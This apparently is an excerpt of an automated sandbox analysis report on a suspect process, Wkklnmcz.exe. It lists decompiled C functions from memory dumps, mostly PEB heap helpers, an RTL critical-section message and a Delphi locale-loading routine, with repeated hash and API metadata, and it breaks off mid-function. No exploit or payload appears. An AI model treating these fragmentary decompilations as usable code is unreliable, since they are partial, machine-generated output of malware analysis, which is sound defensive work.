                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            E010D3A1C(intOrPtr _a4) {
                                                                                void* _t5;

                                                                                return L010D4620(_t5, *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                                                            }

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            E010E36CC(void* __ecx) {
                                                                                if(__ecx > 0x7fffffff) {
                                                                                    return 0;
                                                                                } else {
                                                                                    return L010D4620(__ecx, *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                                                                                }
                                                                            }

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            E010C76E2(void* __ecx) {
                                                                                void* _t5;

                                                                                if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
                                                                                    return L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                                                                                }
                                                                                return _t5;
                                                                            }

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            E010D7D50() {
                                                                                intOrPtr* _t3;

                                                                                _t3 = *((intOrPtr*)( *[fs:0x30] + 0x50));
                                                                                if(_t3 != 0) {
                                                                                    return *_t3;
                                                                                } else {
                                                                                    return _t3;
                                                                                }
                                                                            }

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            E010E2ACB() {
                                                                                void* _t5;

                                                                                return E010CEB70(_t5, *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                            }

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9dd0d863877cd83c9a7b9f2d7ad0b337b827e37b7982ce5ef3d9305d9bb596c8
                                                                            • Instruction ID: d84271b4042756854868afd849ded3c94c53c0624b7fbfd21c91c990c76eaa35
                                                                            • Opcode Fuzzy Hash: 9dd0d863877cd83c9a7b9f2d7ad0b337b827e37b7982ce5ef3d9305d9bb596c8
                                                                            • Instruction Fuzzy Hash: 6A90027164100402D54671D956046060009B7D0381F91C016A0415558EC7D58A56BAA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e5ca15c2072cf6af8a11fc22c1442fcc4171dfbe9fdb815fa8964051c965ee85
                                                                            • Instruction ID: 2d02b62a983d6cffe4aa1e31a59cca03ef7949e5f59deb8f96daa1a1d4b3a03d
                                                                            • Opcode Fuzzy Hash: e5ca15c2072cf6af8a11fc22c1442fcc4171dfbe9fdb815fa8964051c965ee85
                                                                            • Instruction Fuzzy Hash: 5A9002B1A01140434945B1D95A044065015B7E1341391C125A0445564CC7E88855A2A5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 18991e392b65abcff69096f91da0824a64e8bd4fd3691dbc6987e8c50e6e9767
                                                                            • Instruction ID: 63f2cb14097e1d122272a423a8f0d6278272abe9db10a52d16f64e238b2036f0
                                                                            • Opcode Fuzzy Hash: 18991e392b65abcff69096f91da0824a64e8bd4fd3691dbc6987e8c50e6e9767
                                                                            • Instruction Fuzzy Hash: A490027170100402D50761D956146060009E7D1385F91C016E1415559DC7E58953B172
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b0a94bc515b76c7ce5d16b366b7c457f9bba6697a55de5fb221a25e98d2a1950
                                                                            • Instruction ID: 7aba5fa7b604d37544dd5157538e849125b873452414abcc80bfb39587b8b49d
                                                                            • Opcode Fuzzy Hash: b0a94bc515b76c7ce5d16b366b7c457f9bba6697a55de5fb221a25e98d2a1950
                                                                            • Instruction Fuzzy Hash: 7B90027164100802D54571D996147070006E7D0741F51C015A0015558DC7D6896576F1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 45c29989cd56ab9d6700d5282aa919cc7db51b1a73cac5a749f4e49ee4b40420
                                                                            • Instruction ID: 9ae70f672fa2f574a72f9687f92528d8fec9a34088b2d4c7fd1419df4d653306
                                                                            • Opcode Fuzzy Hash: 45c29989cd56ab9d6700d5282aa919cc7db51b1a73cac5a749f4e49ee4b40420
                                                                            • Instruction Fuzzy Hash: 06900271701000529905A6D96A04A4A4105A7F0341B51D019A4005558CC6D488616161
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c54f38cc6a9367760311a08ee3da1b445e776da309a3a70acd127ae9ac16de49
                                                                            • Instruction ID: 317169a68c334021f5a036e84f10f5c8159a2d3e757a2e7d5d2ba7f24198897f
                                                                            • Opcode Fuzzy Hash: c54f38cc6a9367760311a08ee3da1b445e776da309a3a70acd127ae9ac16de49
                                                                            • Instruction Fuzzy Hash: C8900271A0500402D54571D966187060015A7D0341F51D015A0015558DC7D98A5576E1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4be914d9cd0925ed85ff394d4ae4d8a2694c19face177f028054307cefb34a9c
                                                                            • Instruction ID: d5cd2fbdd9b276131ba149b87772651e7e0ebe8ce4abe4b0d77f2db181fb0d0b
                                                                            • Opcode Fuzzy Hash: 4be914d9cd0925ed85ff394d4ae4d8a2694c19face177f028054307cefb34a9c
                                                                            • Instruction Fuzzy Hash: D390047170100403D50571DD770C7070005F7D0341F51D415F041555CDD7D7CC517171
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 90a4325f5f20c507d17a91e1539be3c3513337036c532c714af39b8c46d6b559
                                                                            • Instruction ID: b82f8d17fcce39cd656a51175c438180277d136f400d1695c4bdf1690c94c960
                                                                            • Opcode Fuzzy Hash: 90a4325f5f20c507d17a91e1539be3c3513337036c532c714af39b8c46d6b559
                                                                            • Instruction Fuzzy Hash: 2090027160504442D50565D96608A060005A7D0345F51D015A1055599DC7F58851B171
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c69a281a8cf8154349bf97579b831516a0e2d6fcbc902d936c0bf71423431dd3
                                                                            • Instruction ID: 914bdef2c311007e32b9389ee2b981f77d5ce224028db100dcd47541e89c04be
                                                                            • Opcode Fuzzy Hash: c69a281a8cf8154349bf97579b831516a0e2d6fcbc902d936c0bf71423431dd3
                                                                            • Instruction Fuzzy Hash: 7990027560504442D90565D96A04A870005A7D0345F51D415A041559CDC7D48861B161
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 40727d1f634d774d02e258670c35dc68cc60ed0442292c7bad6c6286caa566b5
                                                                            • Instruction ID: 24946a14830f6f4ae980ed136cc74b1d73ed8e852415d2cd0fe7c4f79e9c28af
                                                                            • Opcode Fuzzy Hash: 40727d1f634d774d02e258670c35dc68cc60ed0442292c7bad6c6286caa566b5
                                                                            • Instruction Fuzzy Hash: DE90027160144002D54571D9964460B5005B7E0341F51C415E0416558CC7D58856A261
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: fdb0ef492e07b8de2288e0a86e14b86b5a1b8bfda0571c111c9857d1ce1f4527
                                                                            • Instruction ID: 3d4d0aa81376ecb7814e1490ed1456fe7b9497aa0139d5f5ca5d9bac80580023
                                                                            • Opcode Fuzzy Hash: fdb0ef492e07b8de2288e0a86e14b86b5a1b8bfda0571c111c9857d1ce1f4527
                                                                            • Instruction Fuzzy Hash: 5090027160140402D50561D95A087470005A7D0342F51C015A5155559EC7E5C8917571
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 852fc38295eb1d574ecdcaf90d585f6cb05d5e8b8f353ff26fa28e6d257c5f35
                                                                            • Instruction ID: 156885876f292487b950adc1625278ad5e1ac55ae6d397bc4f0dac320c0ea249
                                                                            • Opcode Fuzzy Hash: 852fc38295eb1d574ecdcaf90d585f6cb05d5e8b8f353ff26fa28e6d257c5f35
                                                                            • Instruction Fuzzy Hash: F8900271A0500802D55571D956147460005A7D0341F51C015A0015658DC7D58A5576E1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 392593e281beae596ddd864f25c405f79e24aa3b3a4600763180b4ec57272f95
                                                                            • Instruction ID: 4d8e31a7e43ccca69c778ed29bd280171c0b637b6961dcdb197d99ce47f59523
                                                                            • Opcode Fuzzy Hash: 392593e281beae596ddd864f25c405f79e24aa3b3a4600763180b4ec57272f95
                                                                            • Instruction Fuzzy Hash: CD90027160504842D54571D95604A460015A7D0345F51C015A0055698DD7E58D55B6A1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 96cd265355e0b5a92249efab1555b74f03a647e10dc5aee094ebf94a46519c41
                                                                            • Instruction ID: efa4f12146823e4a84f15b08ac7e649b9ae7b961f2e2d9e8f162b02f51f91c45
                                                                            • Opcode Fuzzy Hash: 96cd265355e0b5a92249efab1555b74f03a647e10dc5aee094ebf94a46519c41
                                                                            • Instruction Fuzzy Hash: A090027160144442D54562D95A04B0F4105A7E1342F91C01DA4147558CCAD588556761
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: dad37e4eca691e81d1aea2338d8a48cd261f7fb02ffdbb638b78d10b5b5b55dc
                                                                            • Instruction ID: 7b438a89f0d56d91ecccd4ec9e28c9abf4c1b66b100fae670ef48f29d20685a6
                                                                            • Opcode Fuzzy Hash: dad37e4eca691e81d1aea2338d8a48cd261f7fb02ffdbb638b78d10b5b5b55dc
                                                                            • Instruction Fuzzy Hash: 4190027160100842D50561D95604B460005A7E0341F51C01AA0115658DC7D5C8517561
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                            • Instruction ID: 93f274c54b82353db9cf7ffc6b3f85f9f96d7f4fb82dbc89b857f5f220da980b
                                                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                            • Instruction Fuzzy Hash:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 53%
                                                                            E0114FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                                void* _t7;
                                                                                intOrPtr _t9;
                                                                                intOrPtr _t10;
                                                                                intOrPtr* _t12;
                                                                                intOrPtr* _t13;
                                                                                intOrPtr _t14;
                                                                                intOrPtr* _t15;

                                                                                _t13 = __edx;
                                                                                _push(_a4);
                                                                                _t14 =  *[fs:0x18];
                                                                                _t15 = _t12;
                                                                                _t7 = E010FCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                                _push(_t13);
                                                                                E01145720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                                _t9 =  *_t15;
                                                                                if(_t9 == 0xffffffff) {
                                                                                    _t10 = 0;
                                                                                } else {
                                                                                    _t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                                }
                                                                                _push(_t10);
                                                                                _push(_t15);
                                                                                _push( *((intOrPtr*)(_t15 + 0xc)));
                                                                                _push( *((intOrPtr*)(_t14 + 0x24)));
                                                                                return E01145720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                            }

                                                                            APIs
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0114FDFA
                                                                            Strings
                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u , xrefs: 0114FE2B
                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d , xrefs: 0114FE01
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                            • API String ID: 885266447-3903918235
                                                                            • Opcode ID: 4bad1db470ee570beba5a4ce279f1947e9b46b179cfb4adfa3e9889e8fcfb933
                                                                            • Instruction ID: fbb28d2d54a775c3538ff13e23c531249c72b50af1b8ebceb5f8e62fc96baed8
                                                                            • Opcode Fuzzy Hash: 4bad1db470ee570beba5a4ce279f1947e9b46b179cfb4adfa3e9889e8fcfb933
                                                                            • Instruction Fuzzy Hash: C1F0F632240602BFE6281B89DC02F63BF5AEB44B71F150328F6685A5D1DA62F82086F0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Analysis Process: Wkklnmcz.exe PID: 5368 Parent PID: 3352

                                                                            Executed Functions

                                                                            C-Code - Quality: 87%
E00405E80(CHAR* __eax) {
    CHAR* _v8;
    void* _v12;
    char _v15;
    char _v17;
    char _v18;
    char _v22;
    int _v28;
    char _v289;
    long _t44;
    long _t61;
    long _t63;
    CHAR* _t74;
    struct HINSTANCE__* _t81;
    struct HINSTANCE__* _t88;
    CHAR* _t99;
    CHAR* _t100;
    intOrPtr _t104;
    struct HINSTANCE__* _t112;
    void* _t115;
    void* _t117;
    intOrPtr _t118;

    _t115 = _t117;
    _t118 = _t117 + 0xfffffee0;
    _v8 = __eax;
    GetModuleFileNameA(0, &_v289, 0x105);
    _v22 = 0;
    _t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019, &_v12); // executed
    if(_t44 == 0) {
        L3:
        _push(_t115);
        _push(0x405f85);
        _push( *[fs:eax]);
        *[fs:eax] = _t118;
        _v28 = 5;
        E00405CBC( &_v289, 0x105);
        if(RegQueryValueExA(_v12, &_v289, 0, 0, &_v22, &_v28) != 0 && RegQueryValueExA(_v12, E004060EC, 0, 0, &_v22, &_v28) != 0) {
            _v22 = 0;
        }
        _v18 = 0;
        _pop(_t104);
        *[fs:eax] = _t104;
        _push(E00405F8C);
        return RegCloseKey(_v12);
    } else {
        _t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019, &_v12); // executed
        if(_t61 == 0) {
            goto L3;
        } else {
            _t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019, &_v12); // executed
            if(_t63 != 0) {
                lstrcpynA( &_v289, _v8, 0x105);
                GetLocaleInfoA(GetThreadLocale(), 3, &_v17, 5);
                _t112 = 0;
                if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
                    _t99 = &(( &_v289)[lstrlenA( &_v289)]);
                    while( *_t99 != 0x2e && _t99 != &_v289) {
                        _t99 = _t99 - 1;
                    }
                    _t74 = &_v289;
                    if(_t99 != _t74) {
                        _t100 = &(_t99[1]);
                        if(_v22 != 0) {
                            lstrcpynA(_t100, &_v22, 0x105 - _t100 - _t74);
                            _t112 = LoadLibraryExA( &_v289, 0, "true");
                        }
                        if(_t112 == 0 && _v17 != 0) {
                            lstrcpynA(_t100, &_v17, 0x105 - _t100 - &_v289);
                            _t81 = LoadLibraryExA( &_v289, 0, "true"); // executed
                            _t112 = _t81;
                            if(_t112 == 0) {
                                _v15 = 0;
                                lstrcpynA(_t100, &_v17, 0x105 - _t100 - &_v289);
                                _t88 = LoadLibraryExA( &_v289, 0, "true"); // executed
                                _t112 = _t88;
                            }
                        }
                    }
                }
                return _t112;
            } else {
                goto L3;
            }
        }
    }
}

                                                                            APIs
                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000105,00400000,00461790), ref: 00405E9C
                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00400000,00461790), ref: 00405EBA
                                                                            • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00400000,00461790), ref: 00405ED8
                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405EF6
                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,00405F85,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405F3F
                                                                            • RegQueryValueExA.ADVAPI32(?,004060EC,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00405F85,?,80000001), ref: 00405F5D
                                                                            • RegCloseKey.ADVAPI32(?,00405F8C,00000000,?,?,00000000,00405F85,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405F7F
                                                                            • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405F9C
                                                                            • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405FA9
                                                                            • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00405FAF
                                                                            • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405FDA
                                                                            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00406021
                                                                            • LoadLibraryExA.KERNEL32(?,00000000,?,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00406031
                                                                            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00406059
                                                                            • LoadLibraryExA.KERNEL32(?,00000000,?,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00406069
                                                                            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,?,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 0040608F
                                                                            • LoadLibraryExA.KERNEL32(?,00000000,?,00000001,?,00000105,?,00000000,?,00000001,?,00000105,?,00000000,00000003,?), ref: 0040609F
                                                                            Strings
                                                                            • Software\Borland\Locales , xrefs: 00405EB0, 00405ECE
                                                                            • Software\Borland\Delphi\Locales , xrefs: 00405EEC
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                            • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                            • API String ID: 1759228003-2375825460
                                                                            • Opcode ID: e85b8b5f18f98d11f77dd4a75a6bfc4e909d9d51afbd20e7fd9dae12ec9badaa
                                                                            • Instruction ID: 78b8716c1d6b3f78e059c23326c5bad80ecdfc9d22bb9ed19f786db41dfff9de
                                                                            • Opcode Fuzzy Hash: e85b8b5f18f98d11f77dd4a75a6bfc4e909d9d51afbd20e7fd9dae12ec9badaa
                                                                            • Instruction Fuzzy Hash: 6A516F75A4021D7AFB21D6A48C46FEF7BEC9B04744F4401B7BA04F61C2E67C9E448B69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 87%
E03595784(CHAR* __eax) {
    CHAR* _v8;
    void* _v12;
    char _v15;
    char _v17;
    char _v18;
    char _v22;
    int _v28;
    char _v289;
    long _t44;
    long _t61;
    long _t63;
    CHAR* _t74;
    CHAR* _t99;
    CHAR* _t100;
    intOrPtr _t104;
    struct HINSTANCE__* _t112;
    void* _t115;
    void* _t117;
    intOrPtr _t118;

    _t115 = _t117;
    _t118 = _t117 + 0xfffffee0;
    _v8 = __eax;
    GetModuleFileNameA(0, &_v289, 0x105);
    _v22 = 0;
    _t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019, &_v12); // executed
    if(_t44 == 0) {
        L3:
        _push(_t115);
        _push(0x3595889);
        _push( *[fs:eax]);
        *[fs:eax] = _t118;
        _v28 = 5;
        L035955C0( &_v289, 0x105);
